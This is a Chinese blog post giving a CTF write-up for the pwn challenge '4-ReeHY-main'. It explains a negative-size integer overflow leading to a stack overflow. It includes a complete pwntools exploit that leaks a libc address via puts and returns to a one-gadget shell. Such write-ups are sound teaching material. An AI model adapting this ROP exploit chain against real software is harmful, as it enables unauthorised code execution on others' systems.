看雪4-ReeHY-main-2017

最新推荐文章于 2022-04-05 18:26:07 发布
最新推荐文章于 2022-04-05 18:26:07 发布
阅读量725 收藏
点赞数
分类专栏: pwn 文章标签: pwn 看雪CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/w12315q/article/details/86662149
版权

看雪4-ReeHY-main-2017

题目本身很有意思应该会有很多种解法这里先记录第一种解法,栈的方法

题目链接:https://ctf.pediy.com/game-fight-34.htm

主程序分析

在这里插入图片描述
这里主要实现了几个功能吧,下面一一分析九个功能
在这里插入图片描述

这里首先让我们输入signint然后malloc一个这个大小的堆块,然后input cun让我们输入储存的大小其中不能超过4但是没有对输入进行一个判断,也没有对size的大小正负进行一个判断。所以这里有一个负数溢出的风险。继续分析,可以发现当size<0x70的时候会调用一个read函数,这里利用负数可以输入一个很大的字符串。
在这里插入图片描述
一个普通的堆删除的操作存在double free
在这里插入图片描述
先检查堆是否在使用,如果在不是在使用则会退出
在这里插入图片描述
最坑的函数没有之一,没有show为什么要写show,不过如果是正常的show那么这个题就是普通的unsortbin leak然后double free更改malloc hook了。

思路分析

这里利用思路主要记录的是栈溢出思路,利用负数进行一个大输的输入,这里考验了一个选手对栈分布的把握了。
在这里插入图片描述
这里我们需要对输入进行一个栈的分配,首先我们要绕过memcpy对负数的检查和一些copy这里利用栈分布吧他们改写成0就不会造成什么危害了。

‘a’ * 128+p64(0)+p32(0)+p32(0)+‘a’ * 8

这样就可以成功的绕过了。接下来就是简单的pop啥的操作了

exp

from pwn import*

p = process('./4-ReeHY-main')
a = ELF('./4-ReeHY-main')
e = a.libc
context.log_level = 'debug'

def create(size,index,string):
    p.recvuntil('$ ')
    p.sendline('peanuts')
    p.recvuntil('$')
    p.sendline('1')
    p.recvuntil('Input size\n')
    p.sendline(str(size))
    p.recvuntil('Input cun\n')
    p.sendline(str(index))
    p.recvuntil('Input content\n')
    p.sendline(str(string))
def delte(index):
    p.recvuntil('Chose one to dele\n')
    p.sendline(str(index))
def edit(index,string):
    p.recvuntil('Chose one to edit\n')
    p.sendline(str(index))
    p.recvuntil('Input the content\n')
    p.sendline(str(string))
raw_input()
pop_rdi = 0x0400da3 
pop_rsi_r15 = 0x400da1
put_got = 0x602020
put_plt = 0x4006D0
create(-1,1,'a'*128+p64(0)+p32(0)+p32(0)+'a'*8+p64(pop_rdi)+p64(put_got)+p64(put_plt)+p64(0x0400C8C))

puts_addr = u64(p.recvuntil('\n')[:6].ljust(8,'\x00'))
print hex(puts_addr)
libc_addr = puts_addr - e.symbols['puts']
print hex(libc_addr)
create(-1,1,'a'*128+p64(0)+p32(0)+p32(0)+'a'*8+p64(0x45216+libc_addr))

p.interactive()

未完待续。。。一题多解方法多2019.1.26

Peanuts_CTF
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
看雪论坛精华 第8辑(CHM)
10-27
看雪论坛精华 第8辑(CHM)
unlink 攻防世界4-ReeHY-main
csdn546229768的博客
12-10 584
例题:攻防世界 4-ReeHY-main 当一个chunk释放为unsort bin时会检查上下是否为free chunk,如果上为free chunk则发生合并、合并后会调用unlink函数:(2.23) /* consolidate backward */ if (!prev_inuse(p)) { //当前的p标志位为0(上个chunk free) prevsize = p->prev_size; size += prevsize; //本chunk的size
4-ReeHY-main-double_free
playmaker的博客
06-15 441
4-ReeHY-main-double_free 拿到程序看一下保护和内容只开了NX保护 是一个有关于堆的创建删除编辑的程序。拿到程序寻找漏洞点。首先进入create函数 int result; // eax char buf; // [rsp+0h] [rbp-90h] void *dest; // [rsp+80h] [rbp-10h] int v3; // [rsp+8...
xctf 4-ReeHY-main-100
发蝴蝶和大脑斧的博客
09-24 705
卡了很久,最后发现他给的libc有点问题,还是用libcsearcher找,贼坑。 参考:https://bbs.pediy.com/thread-218300.htm 首先是unlink修改free的got表为puts,泄露函数地址,然后修改free为system。 # -*- coding: utf-8 -*- from pwn import* from LibcSearcher imp...
CTF-PWN-4-ReeHY-main-100(堆溢出+double free+unlink)
SuperGate的博客
10-09 598
程序综述 题目包含了一个动态库.so文件和elf文件,checksec查看: supergate@ubuntu:~/Desktop/Pwn$ checksec pwn [*] '/home/supergate/Desktop/Pwn/pwn' Arch: amd64-64-little RELRO: Partial RELRO Stack: No can...
看雪论坛2004-2006年12月crackme合集
04-07
看雪论坛2004-2006年12月crackme合集,400多个破解方法介绍和crackme。
j-link驱动
07-01
4. **GDB服务器**:J-Link驱动包含GDB服务器,使得开发者可以利用开源GNU调试器(GDB)进行源代码级调试。 5. **仿真与调试**:J-Link提供实时断点、单步执行、变量观察、内存查看等功能,帮助开发者深入理解代码...
看雪论坛登陆器易语言源码-易语言
06-13
4. **网络通信**:登录器需要与服务器进行通信,发送登录请求并接收响应。这涉及TCP/IP协议栈的理解,HTTP或HTTPS协议的使用,以及数据的编码和解码。在易语言中,可能需要使用内置的网络库或第三方库来实现这些功能...
Android容器和虚拟化 - 看雪峰会2019.pdf
07-21
Android容器和虚拟化 - 看雪峰会2019.pdf............
新威胁对策-TSCM - 看雪峰会2019.pdf
07-21
新威胁对策-TSCM - 看雪峰会2019.pdf................
4-ReeHY-main-100 一道题学到了很多的知识
qq_41071646的博客
05-14 1274
先说一下参考链接 https://bbs.pediy.com/thread-218300.htm 然后这个题 其实可以按堆的解法来做 也可以按照 栈的解法来做 这个要看自己的做法了 然后我首先看的是堆的解法 一开始我的想法是 直接 double free直接 到 heap_user 但是失败了 然后看了这篇帖子感觉受益匪浅 然后写篇这个帖子来记录一下 ‘ 然后 那篇帖子其实讲的很明白 我...
段钢:自从那个冬夜看雪,一晃已是十六年
CSDN 人工智能
11-21 2248
本文来源微信公众号:安在,版权归原作者所有。 最近,一则消息引爆了朋友圈,看雪学院获得了永州创投的500万元天使轮投资,作为安全圈内最资深的安全论坛之一,16年来看雪学院滋养了大量安全技术爱好者,被誉为中国软件安全的黄埔军校,今天在盛大全球研发中心一楼咖啡厅,我们见到了看雪学院的掌门人——段钢(kanxue)。看雪:中国软件安全领域最权威的技术站点2000年1月13日,大雪。段刚仍然清楚地记...
4-ReeHY-main-100_最详细题解PWN
seaaseesa的博客
11-04 2152
Libc2.26以下的解法 使用的是double free的unlink漏洞 unlink是利用glibc malloc 的内存回收机制造成攻击的,核心就在于当两个free的堆块在物理上相邻时,会将他们合并,并将原来free的堆块在原来的链表中解链,加入新的链表中,但这样的合并是有条件的,向前或向后合并。 Unsorted bin使用双向链表维护被释放的空间,如果有一个堆块...
XCTF攻防世界 4-ReeHY-main-100 题解
CoLin的pwn小屋
04-05 3690
XCTF 4-ReeHY-main-100 适用于最新版本libc的两种解题姿势
4,main
weixin_33787529的博客
01-29 80
1.主函数是一个特殊的函数,是程序的入口,可以被jvm访问, 2,主函数的定义(主函数是固定格式的) public:代表该函数的访问权限是最大的 static:代表主函数随着累的加载就存在了 void:主函数无返回值 main不是关键字,但是会被jvm识别 函数的参数string[]: 3,主函数可以重载,但是jvm只识别那一个 4,arguments--->args 5...
攻防世界 4-ReeHY-main
weixin_30552811的博客
09-07 211
检查保护机制:    发现 可以好像写got 然后 程序流程 这里 有double free 然后 再发现 这里很有趣 ,要是我的content为零了 且size 小于112 那就从栈上copy一些内容进去 利用double free ,再修改残留在chunk上的fd的信息 就能达到任意地址...
制作chm 手册_2020元旦礼物 | 看雪精华手册17 发布!(补齐之前所有遗漏版本)...
weixin_26775679的博客
01-15 272
这个世界上抱怨自己止步不前的人太多了,但思考自己为什么停滞的人太少。2020年,你需要一些改变了。送你一本看雪精华手册 17辑,带你开启新年新篇章。想要逃离现状,只有自救。学习优秀文章,带你成长。1更新说明看雪论坛精华自2013/01/30发布第13期后暂停了,直到2018年恢复制作。经过看雪论坛版主们的努力付出,已将中断的14、15、16、17精华集全部补齐。各精华集情况如下:2012...
攻防世界 4-ReeHY-main-100
BengDouLove的博客
04-01 773
本来想着做2018年的网鼎杯 pwn的,但是就算看了 wp也无法模仿着实现,所以就退而求其次先做一些堆的题吧 18年网鼎杯的pwn有个babyheap,里面用到的unlink我一直不懂,断链是知道咋实现的,但是到底有啥用真是不做题无法体会 然后在攻防世界找了一个pwn题,就是这道题,看了一个肥肠肥肠细致的博主的文章,收获颇多 传送门 下面我就记录一下,题的思路大致和这个博主一样,后面我自己发挥了一...
(攻防世界)(pwn)4-ReeHY-main
PLpa的博客
10-24 386
这题很早之前就做过了,之前做的时候没怎么注意,这次重新写又有很多感受。 0x00前言 这题有两种做法,一种是堆溢出,一种是栈溢出。第一次写的时候,由于刚刚入门,只会用栈溢出,这次重新看,用堆溢出试了一下,由于技术有限,还是出现了很多错误,找了很多资料,磕磕绊绊一下午才利用成功。 故写此博客记录一下。 0x01栈溢出利用方法 此题的栈溢出漏洞比较明显,因为他有一个很明显的整数溢出漏洞,可以导致栈漏洞...
linux安装docker-compose
最新发布
05-17
4. 测试 Docker Compose 是否成功安装: ``` $ docker-compose --version ``` 如果一切正常,你应该能够看到 Docker Compose 的版本号。 以上就是在 Linux 系统上安装 Docker Compose 的步骤。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值